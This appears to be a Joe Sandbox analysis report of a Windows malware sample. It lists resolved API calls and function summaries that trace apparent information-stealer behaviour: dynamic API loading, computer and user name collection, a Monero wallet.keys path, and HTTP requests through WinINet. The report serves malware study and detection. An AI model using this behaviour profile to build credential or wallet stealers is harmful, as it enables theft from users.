                      • GetProcAddress.KERNEL32(76F70000,01680678), ref: 00EF98D2
                      • GetProcAddress.KERNEL32(76F70000,01680690), ref: 00EF98EA
                      • GetProcAddress.KERNEL32(76F70000,01680600), ref: 00EF9903
                      • GetProcAddress.KERNEL32(76F70000,01688A58), ref: 00EF991B
                      • GetProcAddress.KERNEL32(76F70000,01676960), ref: 00EF9933
                      • GetProcAddress.KERNEL32(76F70000,016765C0), ref: 00EF994C
                      • GetProcAddress.KERNEL32(76F70000,016807B0), ref: 00EF9964
                      • GetProcAddress.KERNEL32(76F70000,01680528), ref: 00EF997C
                      • GetProcAddress.KERNEL32(76F70000,01680558), ref: 00EF9995
                      • GetProcAddress.KERNEL32(76F70000,01680630), ref: 00EF99AD
                      • GetProcAddress.KERNEL32(76F70000,016765E0), ref: 00EF99C5
                      • GetProcAddress.KERNEL32(76F70000,016805E8), ref: 00EF99DE
                      • GetProcAddress.KERNEL32(76F70000,01680618), ref: 00EF99F6
                      • GetProcAddress.KERNEL32(76F70000,01676640), ref: 00EF9A0E
                      • GetProcAddress.KERNEL32(76F70000,016806A8), ref: 00EF9A27
                      • GetProcAddress.KERNEL32(76F70000,016808B8), ref: 00EF9A3F
                      • GetProcAddress.KERNEL32(76F70000,016767C0), ref: 00EF9A57
                      • GetProcAddress.KERNEL32(76F70000,01680828), ref: 00EF9A70
                      • GetProcAddress.KERNEL32(76F70000,01676620), ref: 00EF9A88
                      • LoadLibraryA.KERNEL32(016808A0,?,00EF6A00), ref: 00EF9A9A
                      • LoadLibraryA.KERNEL32(01680840,?,00EF6A00), ref: 00EF9AAB
                      • LoadLibraryA.KERNEL32(01680858,?,00EF6A00), ref: 00EF9ABD
                      • LoadLibraryA.KERNEL32(01680888,?,00EF6A00), ref: 00EF9ACF
                      • LoadLibraryA.KERNEL32(01680870,?,00EF6A00), ref: 00EF9AE0
                      • GetProcAddress.KERNEL32(76DA0000,016808D0), ref: 00EF9B02
                      • GetProcAddress.KERNEL32(75840000,01680810), ref: 00EF9B23
                      • GetProcAddress.KERNEL32(75840000,01688C10), ref: 00EF9B3B
                      • GetProcAddress.KERNEL32(753A0000,01688D18), ref: 00EF9B5D
                      • GetProcAddress.KERNEL32(77300000,01676680), ref: 00EF9B7E
                      • GetProcAddress.KERNEL32(774D0000,01688AE8), ref: 00EF9B9F
                      • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00EF9BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00EF9BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: cb34b070d0d4b620791b477185652954cd4af618fae50acacc67131238996088
                      • Instruction ID: cac5d8da244e654139a4d5ea8325ca203d9d01ec4386d6b2bfd3a6c9e2b41dca
                      • Opcode Fuzzy Hash: cb34b070d0d4b620791b477185652954cd4af618fae50acacc67131238996088
                      • Instruction Fuzzy Hash: FFA12BB5500640BFD37CDFA8F688A6637F9FB4C202714453AE626C3A4CE67A94E1CB54

                      Control-flow Graph: function ee45c0-ee47a9 (RtlAllocateHeap, then a loop over ee46a0-ee474a, then VirtualProtect; graph image not reproduced here)
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EE479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EE45C7, 00EE45D2, 00EE45DD, 00EE45E8, 00EE45F3, 00EE4617, 00EE4622, 00EE462D, 00EE4638, 00EE4643, 00EE4657, 00EE4662, 00EE466D, 00EE4678, 00EE4683, 00EE46AC, 00EE46B7, 00EE46C2, 00EE46CD, 00EE46D8, 00EE4713, 00EE471E, 00EE4729, 00EE4734, 00EE473F, 00EE474F, 00EE475A, 00EE4765, 00EE4770, 00EE477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this same sentence is repeated many times in the string, `$`-separated)
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: 979e6038ac58d9a01d4cd153c985f8e235f796ec0bfd5f74312c1dacc0186e9d
                      • Instruction ID: 68862fde5b699ae52c597474e95ceebc3243278f48c1f0719ebeedbc4cce38db
                      • Opcode Fuzzy Hash: 979e6038ac58d9a01d4cd153c985f8e235f796ec0bfd5f74312c1dacc0186e9d
                      • Instruction Fuzzy Hash: D541EF607D7706AADB24FBE4C84FA9E77566FC2B10F506040B908522F6CEF0A5087B27

                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                      • Function ee4880-ee4f2d. API calls in the graph: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, HttpSendRequestA, InternetReadFile, InternetCloseHandle. Internal subcalls: efa7a0, ee47b0, efa740, ef8b60, efa920, efa8a0, efa800, efa9b0, efaad0, ee9ac0, efa820, ef8990.
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE4915
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE4ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F00DDB,00000000,?,?,00000000,?,",00000000,?,0168E320), ref: 00EE4DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE4E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE4E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EE4E49
                      • InternetCloseHandle.WININET(00000000), ref: 00EE4EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00EE4EC5
                      • HttpOpenRequestA.WININET(00000000,0168E4E0,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE4B15
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • InternetCloseHandle.WININET(00000000), ref: 00EE4ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: 800242c81e01f15129b42513a6e832a5c238deca2cd9dccea8e48ee741bf9ca8
                      • Instruction ID: 731a8ef0c5b03ae4ce9d24ff8932ce2a6477f8f801f2d2bfd6bffc5a49b13654
                      • Opcode Fuzzy Hash: 800242c81e01f15129b42513a6e832a5c238deca2cd9dccea8e48ee741bf9ca8
                      • Instruction Fuzzy Hash: 08122EB291015CAADB18EB50DC56FEEB3B8AF54300F5451B9B20A76091DFB02F49CF62
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00EF792F
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: de9d60ad400212bf433a4a5aef941caee135bde520a685b6c1846e6d86700155
                      • Instruction ID: 2303cff5b215914227245d27c7a79c92284b12d16c6302410897e755f7292a88
                      • Opcode Fuzzy Hash: de9d60ad400212bf433a4a5aef941caee135bde520a685b6c1846e6d86700155
                      • Instruction Fuzzy Hash: AA0186B1A08209EBC714DF94DD45BAABBB8FB44B11F104229FA55F3680C7B459408BA1
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE11B7), ref: 00EF7880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF7887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF789F
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: fa7fa664a0941482d58f51d0717a6072b9e25c7051c15c6e965b0358f91cb07e
                      • Instruction ID: 425ee2d25e866d22028e2bff4f3e4b14215f91134dffb09e9c6e58a4afd8754b
                      • Opcode Fuzzy Hash: fa7fa664a0941482d58f51d0717a6072b9e25c7051c15c6e965b0358f91cb07e
                      • Instruction Fuzzy Hash: 3AF04FB1944208ABC724DF98E949FAEBBB8EB04711F10066AFA15A3680C7B515448BA1
                      APIs
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 43d652a6c954813eaeb7621c2ebf24c4658962bd721b7e92e04a003d7d814610
                      • Instruction ID: c0956849580106fcdb49ef927bdf82e8a0dec1bf1b14b06166c670c7672e1504
                      • Opcode Fuzzy Hash: 43d652a6c954813eaeb7621c2ebf24c4658962bd721b7e92e04a003d7d814610
                      • Instruction Fuzzy Hash: 60D05E7490030CEBCB28DFE0E8496EDBB78FB08311F0015A4D90673740EA3154D1CBA9

                      Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed)
                      • Function ef9c10-efa709. API calls in the graph: LoadLibraryA (8 calls) followed by GetProcAddress in every subsequent block, one group of resolutions per loaded module.
                      APIs
                      • GetProcAddress.KERNEL32(76F70000,016768C0), ref: 00EF9C2D
                      • GetProcAddress.KERNEL32(76F70000,016766A0), ref: 00EF9C45
                      • GetProcAddress.KERNEL32(76F70000,01688F58), ref: 00EF9C5E
                      • GetProcAddress.KERNEL32(76F70000,01688EF8), ref: 00EF9C76
                      • GetProcAddress.KERNEL32(76F70000,0168C270), ref: 00EF9C8E
                      • GetProcAddress.KERNEL32(76F70000,0168C168), ref: 00EF9CA7
                      • GetProcAddress.KERNEL32(76F70000,0167B2D8), ref: 00EF9CBF
                      • GetProcAddress.KERNEL32(76F70000,0168C288), ref: 00EF9CD7
                      • GetProcAddress.KERNEL32(76F70000,0168C2A0), ref: 00EF9CF0
                      • GetProcAddress.KERNEL32(76F70000,0168C108), ref: 00EF9D08
                      • GetProcAddress.KERNEL32(76F70000,0168C1F8), ref: 00EF9D20
                      • GetProcAddress.KERNEL32(76F70000,01676600), ref: 00EF9D39
                      • GetProcAddress.KERNEL32(76F70000,016768E0), ref: 00EF9D51
                      • GetProcAddress.KERNEL32(76F70000,016766E0), ref: 00EF9D69
                      • GetProcAddress.KERNEL32(76F70000,01676700), ref: 00EF9D82
                      • GetProcAddress.KERNEL32(76F70000,0168C1E0), ref: 00EF9D9A
                      • GetProcAddress.KERNEL32(76F70000,0168C2B8), ref: 00EF9DB2
                      • GetProcAddress.KERNEL32(76F70000,0167B1C0), ref: 00EF9DCB
                      • GetProcAddress.KERNEL32(76F70000,01676900), ref: 00EF9DE3
                      • GetProcAddress.KERNEL32(76F70000,0168C2D0), ref: 00EF9DFB
                      • GetProcAddress.KERNEL32(76F70000,0168C0D8), ref: 00EF9E14
                      • GetProcAddress.KERNEL32(76F70000,0168C300), ref: 00EF9E2C
                      • GetProcAddress.KERNEL32(76F70000,0168C210), ref: 00EF9E44
                      • GetProcAddress.KERNEL32(76F70000,01676720), ref: 00EF9E5D
                      • GetProcAddress.KERNEL32(76F70000,0168C240), ref: 00EF9E75
                      • GetProcAddress.KERNEL32(76F70000,0168C120), ref: 00EF9E8D
                      • GetProcAddress.KERNEL32(76F70000,0168C2E8), ref: 00EF9EA6
                      • GetProcAddress.KERNEL32(76F70000,0168C180), ref: 00EF9EBE
                      • GetProcAddress.KERNEL32(76F70000,0168C318), ref: 00EF9ED6
                      • GetProcAddress.KERNEL32(76F70000,0168C030), ref: 00EF9EEF
                      • GetProcAddress.KERNEL32(76F70000,0168C198), ref: 00EF9F07
                      • GetProcAddress.KERNEL32(76F70000,0168C1B0), ref: 00EF9F1F
                      • GetProcAddress.KERNEL32(76F70000,0168C138), ref: 00EF9F38
                      • GetProcAddress.KERNEL32(76F70000,0168C8C8), ref: 00EF9F50
                      • GetProcAddress.KERNEL32(76F70000,0168C0A8), ref: 00EF9F68
                      • GetProcAddress.KERNEL32(76F70000,0168C258), ref: 00EF9F81
                      • GetProcAddress.KERNEL32(76F70000,01676740), ref: 00EF9F99
                      • GetProcAddress.KERNEL32(76F70000,0168C048), ref: 00EF9FB1
                      • GetProcAddress.KERNEL32(76F70000,01676920), ref: 00EF9FCA
                      • GetProcAddress.KERNEL32(76F70000,0168C060), ref: 00EF9FE2
                      • GetProcAddress.KERNEL32(76F70000,0168C228), ref: 00EF9FFA
                      • GetProcAddress.KERNEL32(76F70000,01676260), ref: 00EFA013
                      • GetProcAddress.KERNEL32(76F70000,01676220), ref: 00EFA02B
                      • LoadLibraryA.KERNEL32(0168C1C8,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA03D
                      • LoadLibraryA.KERNEL32(0168C078,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA04E
                      • LoadLibraryA.KERNEL32(0168C150,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA060
                      • LoadLibraryA.KERNEL32(0168C0C0,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA072
                      • LoadLibraryA.KERNEL32(0168C090,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA083
                      • LoadLibraryA.KERNEL32(0168C0F0,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA095
                      • LoadLibraryA.KERNEL32(0168C3D8,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA0A7
                      • LoadLibraryA.KERNEL32(0168C3F0,?,00EF5CA3,00F00AEB,?,?,?,?,?,?,?,?,?,?,00F00AEA,00F00AE3), ref: 00EFA0B8
                      • GetProcAddress.KERNEL32(75840000,01676400), ref: 00EFA0DA
                      • GetProcAddress.KERNEL32(75840000,0168C468), ref: 00EFA0F2
                      • GetProcAddress.KERNEL32(75840000,01688B58), ref: 00EFA10A
                      • GetProcAddress.KERNEL32(75840000,0168C438), ref: 00EFA123
                      • GetProcAddress.KERNEL32(75840000,016761E0), ref: 00EFA13B
                      • GetProcAddress.KERNEL32(73AF0000,0167AE28), ref: 00EFA160
                      • GetProcAddress.KERNEL32(73AF0000,016763A0), ref: 00EFA179
                      • GetProcAddress.KERNEL32(73AF0000,0167ADD8), ref: 00EFA191
                      • GetProcAddress.KERNEL32(73AF0000,0168C528), ref: 00EFA1A9
                      • GetProcAddress.KERNEL32(73AF0000,0168C3A8), ref: 00EFA1C2
                      • GetProcAddress.KERNEL32(73AF0000,01676500), ref: 00EFA1DA
                      • GetProcAddress.KERNEL32(73AF0000,01676560), ref: 00EFA1F2
                      • GetProcAddress.KERNEL32(73AF0000,0168C348), ref: 00EFA20B
                      • GetProcAddress.KERNEL32(760B0000,01676440), ref: 00EFA22C
                      • GetProcAddress.KERNEL32(760B0000,016763E0), ref: 00EFA244
                      • GetProcAddress.KERNEL32(760B0000,0168C618), ref: 00EFA25D
                      • GetProcAddress.KERNEL32(760B0000,0168C420), ref: 00EFA275
                      • GetProcAddress.KERNEL32(760B0000,016762E0), ref: 00EFA28D
                      • GetProcAddress.KERNEL32(75D30000,0167B238), ref: 00EFA2B3
                      • GetProcAddress.KERNEL32(75D30000,0167B260), ref: 00EFA2CB
                      • GetProcAddress.KERNEL32(75D30000,0168C4E0), ref: 00EFA2E3
                      • GetProcAddress.KERNEL32(75D30000,01676520), ref: 00EFA2FC
                      • GetProcAddress.KERNEL32(75D30000,01676580), ref: 00EFA314
                      • GetProcAddress.KERNEL32(75D30000,0167AD88), ref: 00EFA32C
                      • GetProcAddress.KERNEL32(753A0000,0168C540), ref: 00EFA352
                      • GetProcAddress.KERNEL32(753A0000,016761C0), ref: 00EFA36A
                      • GetProcAddress.KERNEL32(753A0000,01688A78), ref: 00EFA382
                      • GetProcAddress.KERNEL32(753A0000,0168C588), ref: 00EFA39B
                      • GetProcAddress.KERNEL32(753A0000,0168C450), ref: 00EFA3B3
                      • GetProcAddress.KERNEL32(753A0000,01676540), ref: 00EFA3CB
                      • GetProcAddress.KERNEL32(753A0000,016762A0), ref: 00EFA3E4
                      • GetProcAddress.KERNEL32(753A0000,0168C3C0), ref: 00EFA3FC
                      • GetProcAddress.KERNEL32(753A0000,0168C4C8), ref: 00EFA414
                      • GetProcAddress.KERNEL32(76DA0000,01676420), ref: 00EFA436
                      • GetProcAddress.KERNEL32(76DA0000,0168C4F8), ref: 00EFA44E
                      • GetProcAddress.KERNEL32(76DA0000,0168C408), ref: 00EFA466
                      • GetProcAddress.KERNEL32(76DA0000,0168C480), ref: 00EFA47F
                      • GetProcAddress.KERNEL32(76DA0000,0168C330), ref: 00EFA497
                      • GetProcAddress.KERNEL32(77300000,016765A0), ref: 00EFA4B8
                      • GetProcAddress.KERNEL32(77300000,01676200), ref: 00EFA4D1
                      • GetProcAddress.KERNEL32(767E0000,01676240), ref: 00EFA4F2
                      • GetProcAddress.KERNEL32(767E0000,0168C498), ref: 00EFA50A
                      • GetProcAddress.KERNEL32(6F8E0000,01676380), ref: 00EFA530
                      • GetProcAddress.KERNEL32(6F8E0000,01676480), ref: 00EFA548
                      • GetProcAddress.KERNEL32(6F8E0000,01676280), ref: 00EFA560
                      • GetProcAddress.KERNEL32(6F8E0000,0168C4B0), ref: 00EFA579
                      • GetProcAddress.KERNEL32(6F8E0000,01676300), ref: 00EFA591
                      • GetProcAddress.KERNEL32(6F8E0000,016762C0), ref: 00EFA5A9
                      • GetProcAddress.KERNEL32(6F8E0000,016763C0), ref: 00EFA5C2
                      • GetProcAddress.KERNEL32(6F8E0000,01676340), ref: 00EFA5DA
                      • GetProcAddress.KERNEL32(6F8E0000,InternetSetOptionA), ref: 00EFA5F1
                      • GetProcAddress.KERNEL32(6F8E0000,HttpQueryInfoA), ref: 00EFA607
                      • GetProcAddress.KERNEL32(75760000,0168C510), ref: 00EFA629
                      • GetProcAddress.KERNEL32(75760000,01688AC8), ref: 00EFA641
                      • GetProcAddress.KERNEL32(75760000,0168C558), ref: 00EFA659
                      • GetProcAddress.KERNEL32(75760000,0168C600), ref: 00EFA672
                      • GetProcAddress.KERNEL32(762C0000,01676320), ref: 00EFA693
                      • GetProcAddress.KERNEL32(6D6E0000,0168C360), ref: 00EFA6B4
                      • GetProcAddress.KERNEL32(6D6E0000,01676360), ref: 00EFA6CD
                      • GetProcAddress.KERNEL32(6D6E0000,0168C570), ref: 00EFA6E5
                      • GetProcAddress.KERNEL32(6D6E0000,0168C5A0), ref: 00EFA6FD
                      Strings
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: 683b6569f4470cc6ea7e16618a4b275833de179fe5cae4a50126a82a55376aa7
                      • Instruction ID: 3802de1037474f24b450e8e75397c8c6c43684e6c244f50b99628248c0876a39
                      • Opcode Fuzzy Hash: 683b6569f4470cc6ea7e16618a4b275833de179fe5cae4a50126a82a55376aa7
                      • Instruction Fuzzy Hash: 17621BB5500A40BFC37CDFA8F68895637F9FF4C601314853AE62AC3A4CD67A94E19B58

                      Control-flow Graph

                      • Graph of the function whose first basic block is ee6280-ee630b; node and edge rendering not reproduced, the API calls it makes are listed under APIs below
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • InternetOpenA.WININET(00F00DFE,00000001,00000000,00000000,00000000), ref: 00EE62E1
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE6335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE6385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EE63BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE63D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EE63FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EE646D
                      • InternetCloseHandle.WININET(00000000), ref: 00EE64EF
                      • InternetCloseHandle.WININET(00000000), ref: 00EE64F9
                      • InternetCloseHandle.WININET(00000000), ref: 00EE6503
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 6db72ae4c55c95fda492e5c4ba08a1e8e3d3e20e4cd9a7a3e73307980687dc4f
                      • Instruction ID: 5e213b533e77632ecaa8f175bfeb7de51e67d2a521504ea965670938bfdb7a9e
                      • Opcode Fuzzy Hash: 6db72ae4c55c95fda492e5c4ba08a1e8e3d3e20e4cd9a7a3e73307980687dc4f
                      • Instruction Fuzzy Hash: A0713A71A0025CABDB24DFA0DC49BEE77B8BB44700F1091A9F60A7B5C4DBB46A85CF51

                      Control-flow Graph

                      • Graph of the function whose first basic block is ef5510-ef5577; node and edge rendering not reproduced, the API calls it makes are listed under APIs below
                      APIs
                        • Part of subcall function 00EFA820: lstrlen.KERNEL32(00EE4F05,?,?,00EE4F05,00F00DDE), ref: 00EFA82B
                        • Part of subcall function 00EFA820: lstrcpy.KERNEL32(00F00DDE,00000000), ref: 00EFA885
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF56A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5857
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5228
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5318
                        • Part of subcall function 00EF52C0: lstrlen.KERNEL32(00000000), ref: 00EF532F
                        • Part of subcall function 00EF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00EF5364
                        • Part of subcall function 00EF52C0: lstrlen.KERNEL32(00000000), ref: 00EF5383
                        • Part of subcall function 00EF52C0: lstrlen.KERNEL32(00000000), ref: 00EF53AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EF5A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00EF5A1B
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 05fcb8af933401f52d8563a8907988996b0d5c50216ca5214cb5364a4b05af42
                      • Instruction ID: 5ddbd443e907ff43acadeaf5e490e122b70e0047ea521060148079095937c4b5
                      • Opcode Fuzzy Hash: 05fcb8af933401f52d8563a8907988996b0d5c50216ca5214cb5364a4b05af42
                      • Instruction Fuzzy Hash: 98E184B291010CAACB18FBA0E856DFD73B8AF54340F449138F61A77095EF746A59CB92

                      Control-flow Graph

                      • Graph of the function whose first basic block is ef17a0-ef17cd; node and edge rendering not reproduced, the API calls it makes are listed under APIs below
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00EF17C5
                      • ExitProcess.KERNEL32 ref: 00EF17D1
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 899f872539910e8801726d8f3b0aa968968663fb03c3722ef0ac4d6919863414
                      • Instruction ID: 73cc6c33b16607e42579418560cae83a5a58d3a04949e8b5dd23e342d74d9a5c
                      • Opcode Fuzzy Hash: 899f872539910e8801726d8f3b0aa968968663fb03c3722ef0ac4d6919863414
                      • Instruction Fuzzy Hash: 5B515FB4A0420DEBCB18DFA0D994BBE77B5BF84704F109098E6157B340DBB0D951EBA2

                      Control-flow Graph

                      • Graph of the function whose first basic block is ef7500-ef754a; node and edge rendering not reproduced, the API calls it makes are listed under APIs below
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EF7542
